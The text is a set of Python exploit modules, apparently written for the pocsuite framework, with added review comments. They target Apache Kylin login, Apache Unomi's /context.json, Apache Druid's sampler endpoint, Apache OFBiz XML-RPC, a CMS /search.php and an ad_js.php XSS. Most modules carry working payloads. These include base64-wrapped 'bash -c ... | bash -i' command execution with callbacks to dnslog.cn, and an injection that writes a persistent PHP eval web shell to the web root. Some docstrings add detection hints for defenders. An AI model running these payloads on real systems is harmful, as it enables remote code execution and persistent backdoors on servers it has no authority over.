     login_url = urljoin(self.url, '/kylin/api/user/authentication')
     login_data = b64encode((self.get_option("username") + ":" +
                             self.get_option("password")).encode("utf-8"))
     headers = {"Authorization": "Basic %s" % login_data.decode('utf-8')}
     post_data = {}
     try:
         resp = requests.post(login_url, data=post_data, headers=headers)
         if resp.status_code == 401:
             logger.info("账号或密码错误")
         if resp.status_code == 200:
             cookies = requests.utils.dict_from_cookiejar(resp.cookies)
             # KeyError here if the server sets no JSESSIONID (caught below).
             cookie = "JSESSIONID=" + cookies["JSESSIONID"]
             # NOTE(review): writes the session credential into the info log.
             logger.info("获得的Cookie为:%s" % cookie)
             logger.info("Apache_Kylin登录成功")
         else:
             logger.info("Apache_Kylin登录失败,响应状态码为 %s " %
                         str(resp.status_code))
     except Exception as e:
         # Logger.warn is a deprecated alias of Logger.warning.
         logger.warn(str(e))
         logger.warn("Apache_Kylin登录失败")
     return cookie
    def _verify(self):
        """Out-of-band DNS check via dnslog.cn for the /context.json endpoint.

        Obtains a throwaway dnslog.cn domain, sends a ``ping catchyou.<domain>``
        command (base64-wrapped in ``bash -c``) inside ``pocjson``, waits five
        seconds and then checks the dnslog records for ``catchyou``.  Returns
        ``self.parse_attack(result)``.

        NOTE(review): depends on a third-party logging service at runtime; the
        raw dnslog response is stored as evidence.
        """
        result = {}
        getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
        getres_url = 'http://www.dnslog.cn/getrecords.php'
        dnsheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
        }
        # One session so the records lookup below sees the domain issued here.
        dnssess = requests.session()
        # Obtain the dnslog subdomain.
        try:
            dnsreq = dnssess.get(url=getdnssub_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
        except Exception as e:
            # NOTE(review): if this request fails, dnsreq is unbound and the
            # 'payload = ...' line below raises UnboundLocalError outside any try.
            logger.warn(str(e))

        # Send the request that pings dnslog.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): fixed Content-Length cannot match the real body size;
            # requests normally recomputes it -- confirm, and drop it.
            'Content-Length': '1003',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        payload = 'ping catchyou.' + dnsreq.text
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        pocjson = '{"personalizations":[{"id":"gender-test","strategy":"matching-first","strategyOptions":{"fallback":"var2"},"contents":[{"filters":[{"condition":{"parameterValues":{"propertyName":"(#runtimeclass = #this.getClass().forName(\\"java.lang.Runtime\\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\\"getRuntime\\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\\"exec\\")}.{? #this.getParameters()[0].getType().getName().equals(\\"java.lang.String\\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\\"' + payload + '\\"))","comparisonOperator":"equals","propertyValue":"male"},"type":"profilePropertyCondition"}}]}]}],"sessionId":"6666"} '
        # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        try:
            # r2 is never inspected.
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS verification disabled; sends the ping command
            # Fixed wait for the DNS record to appear at dnslog.
            time.sleep(5)
        except Exception as e:
            logger.warn(str(e))
        # Check the dnslog records.
        try:
            dnsres = dnssess.get(url=getres_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
            if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
                result['VerifyInfo'] = {}
                # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
                result['VerifyInfo']['URL'] = self.url
                result['extra'] = {}
                result['extra']['evidence'] = dnsres.text
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_attack(result)
    def _verify(self):
        """Out-of-band DNS check via dnslog.cn for the /context.json endpoint.

        Identical to the preceding example except that the command is embedded
        in a ``script::`` condition rather than an OGNL-style expression.
        Returns ``self.parse_attack(result)``.

        NOTE(review): depends on a third-party logging service at runtime; the
        raw dnslog response is stored as evidence.
        """
        result = {}
        getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
        getres_url = 'http://www.dnslog.cn/getrecords.php'
        dnsheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
        }
        # One session so the records lookup below sees the domain issued here.
        dnssess = requests.session()
        # Obtain the dnslog subdomain.
        try:
            dnsreq = dnssess.get(url=getdnssub_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
        except Exception as e:
            # NOTE(review): if this request fails, dnsreq is unbound and the
            # 'payload = ...' line below raises UnboundLocalError outside any try.
            logger.warn(str(e))

        # Send the request that pings dnslog.
        pocurl = self.url + '/context.json'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36',
            'Content-Type': 'application/json;charset=UTF-8',
            # NOTE(review): fixed Content-Length cannot match the real body size;
            # requests normally recomputes it -- confirm, and drop it.
            'Content-Length': '1003',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        payload = 'ping catchyou.' + dnsreq.text
        payload = 'bash -c {echo,' + (base64.b64encode(
            payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}'
        pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\" ' + payload + '\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        # pocjson = '{"filters": [{ "id": "6666","filters": [ {"condition": {"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); r.exec(\\"bash -c {echo,' + (base64.b64encode(payload.encode('utf8'))).decode('utf8') + '}|{base64,-d}|{bash,-i}\\");" }, "type": "profilePropertyCondition"}}]}],"sessionId": "6666"}'
        try:
            # r2 is never inspected.
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # TLS verification disabled; sends the ping command
            # Fixed wait for the DNS record to appear at dnslog.
            time.sleep(5)
        except Exception as e:
            logger.warn(str(e))
        # Check the dnslog records.
        try:
            dnsres = dnssess.get(url=getres_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
            if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
                result['VerifyInfo'] = {}
                # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
                result['VerifyInfo']['URL'] = self.url
                result['extra'] = {}
                result['extra']['evidence'] = dnsres.text
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_attack(result)
    def _verify(self):
        """Post a serialized payload to /webtools/control/xmlrpc and record the reply.

        ``payload`` is a placeholder here (the real value is not on the page).
        The success condition only checks that the endpoint answered 200 with
        ``XML-RPC`` in the body, i.e. that the endpoint is present, not that the
        payload had any effect.  Returns ``self.parse_attack(result)``.
        """
        result = {}
        mainurl = self.url + '/myportal/control/main'
        # NOTE(review): this request is outside the try block, so a connection
        # error here propagates instead of being logged like the others.
        r1 = requests.get(url=mainurl, verify=False)
        # Debug print to stdout; the rest of the file uses logger.
        print(r1.status_code, r1.text)

        pocurl = self.url + '/webtools/control/xmlrpc'
        # NOTE(review): fixed Content-Length cannot match the real body size;
        # requests normally recomputes it -- confirm, and drop it.
        headers = {'Content-Type': 'application/xml', 'Content-Length': '4127'}
        payload = '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'  #input your payload encoded by ysoserial
        pocxml = '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">' + payload + '</serializable></value></member></struct></value></param></params></methodCall>'
        try:
            r2 = requests.post(url=pocurl,
                               headers=headers,
                               data=pocxml,
                               verify=False)  # TLS verification disabled
            if r2.status_code == 200 and 'XML-RPC' in r2.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['extra'] = {}
                result['extra']['evidence'] = r2.text
        except Exception as e:
            # Logger.warn is a deprecated alias of Logger.warning.
            logger.warn(str(e))
        return self.parse_attack(result)
 def _attack(self):
     """Attack mode against ``/search.php``: posts an injection payload that writes
     ``<random_string>.php`` (a PHP file that evals a POST parameter) into the web
     root, then fetches that file and reports it when the random marker is reflected
     with HTTP 200.

     Side effect on the target: the created ``.php`` file is persistent and is not
     removed by this code. Detection for defenders: a new 16-character random-name
     ``.php`` file in the web root, preceded by a POST to ``/search.php``.

     Returns ``self.parse_output(result)``.

     Review notes (not fixed here): ``resp`` from the POST is unused and its status
     is not checked; neither request sets a timeout; ``shell_url`` is computed and
     then recomputed inline for ``Shell_url``; ``Shell_pass`` is a masked literal in
     this listing.
     """
     result = {}
     random_string = random_str(16)
     verify_payload = "searchword=1&searchtype=5&order=}{end if}{if:1)$_POST[func]($_POST[cmd]);if(1}{end if}&cmd=fwrite(fopen('" + random_string + ".php','w'),'<?php @eval($_POST[sma11stu]);?>" + random_string + "')&func=assert"
     veri_url = urljoin(self.url, '/search.php')
     shell_url = urljoin(self.url, '/' + random_string + '.php')
     headers = {
         "Content-Type": "application/x-www-form-urlencoded;charset=utf-8",
         "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
     }
     try:
         resp = requests.post(veri_url,data=verify_payload,headers=headers)  # response not inspected
         time.sleep(1)
         resp_1 = requests.get(shell_url,headers=headers)
         # Success = the random marker written by the payload is served back.
         if (random_string in resp_1.text) and resp_1.status_code == 200:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
             result['VerifyInfo']['Shell_url'] = urljoin(self.url, '/' + random_string + '.php')  # same value as shell_url
             result['VerifyInfo']['Shell_pass'] = "******"
     except Exception as e:
         logger.warn(str(e))
     return self.parse_output(result)
    def _verify(self):
        """Out-of-band command-execution check against ``/druid/indexer/v1/sampler``.

        Flow: obtain a throwaway subdomain from dnslog.cn, POST a sampler spec whose
        JavaScript filter calls ``java.lang.Runtime.getRuntime().exec`` with
        ``ping catchyou.<subdomain>``, wait five seconds, then poll dnslog.cn and
        mark the result positive if a record containing ``catchyou`` came back.
        Detection for defenders: a POST to the sampler endpoint with a
        ``"type": "javascript"`` filter, followed by DNS resolution of an unfamiliar
        subdomain from the Druid host.

        Returns ``self.parse_attack(result)``.

        Review notes (not fixed here):
        - if the first dnslog request raises, ``dnsreq`` stays unbound and the
          ``dnsreq.text`` access below raises ``NameError`` outside any ``try``;
        - the POST to the target has no timeout; every request disables TLS
          certificate verification;
        - ``Content-Length`` is hard-coded to 1003 and does not match the body;
        - callback records are stored on a third-party service.
        """
        result = {}
        getdnssub_url = 'http://www.dnslog.cn/getdomain.php'
        getres_url = 'http://www.dnslog.cn/getrecords.php'
        dnsheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64'
        }
        dnssess = requests.session()  # reused for both dnslog calls (presumably cookie-bound; confirm)
        # obtain a dnslog subdomain
        try:
            dnsreq = dnssess.get(url=getdnssub_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
        except Exception as e:
            logger.warn(str(e))  # NOTE(review): execution continues with dnsreq unbound

        # send the request that makes the target ping the dnslog domain
        pocurl = self.url + '/druid/indexer/v1/sampler?for=filter'
        pocheaders = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64',
            'Content-Type': 'application/json;charset=UTF-8',
            'Content-Length': '1003',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9'
        }
        payload = 'ping catchyou.' + dnsreq.text  # NameError here if the dnslog request above failed
        pocjson = '{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\\"isRobot\\":true,\\"channel\\":\\"#x\\",\\"timestamp\\":\\"2021-2-1T14:12:24.050Z\\",\\"flags\\":\\"x\\",\\"isUnpatrolled\\":false,\\"page\\":\\"1\\",\\"diffUrl\\":\\"https://xxx.com\\",\\"added\\":1,\\"comment\\":\\"Botskapande Indonesien omdirigering\\",\\"commentLength\\":35,\\"isNew\\":true,\\"isMinor\\":false,\\"delta\\":31,\\"isAnonymous\\":true,\\"user\\":\\"Lsjbot\\",\\"deltaBucket\\":0,\\"deleted\\":0,\\"namespace\\":\\"Main\\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(\'' + payload + '\')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}'
        try:
            r2 = requests.post(url=pocurl,
                               headers=pocheaders,
                               data=pocjson,
                               verify=False)  # triggers the ping command; no timeout set
            time.sleep(5)  # fixed wait for the DNS callback to be recorded
        except Exception as e:
            logger.warn(str(e))
        # check the dnslog records
        try:
            dnsres = dnssess.get(url=getres_url,
                                 headers=dnsheaders,
                                 allow_redirects=False,
                                 verify=False,
                                 timeout=10)
            if dnsres.status_code == 200 and 'catchyou' in dnsres.text:
                result['VerifyInfo'] = {}
                # result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, pr.port)
                result['VerifyInfo']['URL'] = self.url
                result['extra'] = {}
                result['extra']['evidence'] = dnsres.text
        except Exception as e:
            logger.warn(str(e))
        return self.parse_attack(result)
 def _verify(self):
     """Reflected-XSS check: requests ``ad_js.php?ad_id=<script>alert()</script>``
     and reports a finding when the marker appears verbatim in an HTTP 200 response.

     Returns ``self.parse_output(result)``.

     Review notes (not fixed here): the two ``logger.warn`` calls on the payload and
     URL are debug output at warning level and fire on every run; ``urljoin`` with a
     relative path replaces the last path segment of ``self.url`` when it has no
     trailing slash, so the probe may hit the wrong directory; the GET has no
     timeout; a verbatim substring match is the only criterion, so a response that
     HTML-encodes the marker is (correctly) negative while one that reflects it in a
     non-executing context would still be reported positive.
     """
     result = {}
     xss_payload = "<script>alert()</script>"
     verify_payload = "ad_js.php?ad_id=" + xss_payload
     logger.warn(verify_payload)  # debug output
     veri_url = urljoin(self.url,verify_payload)  # relative join, see docstring
     logger.warn(veri_url)  # debug output
     headers = {
         "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
     }
     try:
         resp = requests.get(veri_url,headers=headers)
         if xss_payload in resp.text and resp.status_code == 200:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = veri_url
             result['VerifyInfo']['Payload'] = verify_payload
     except Exception as e:
         logger.warn(str(e))
     return self.parse_output(result)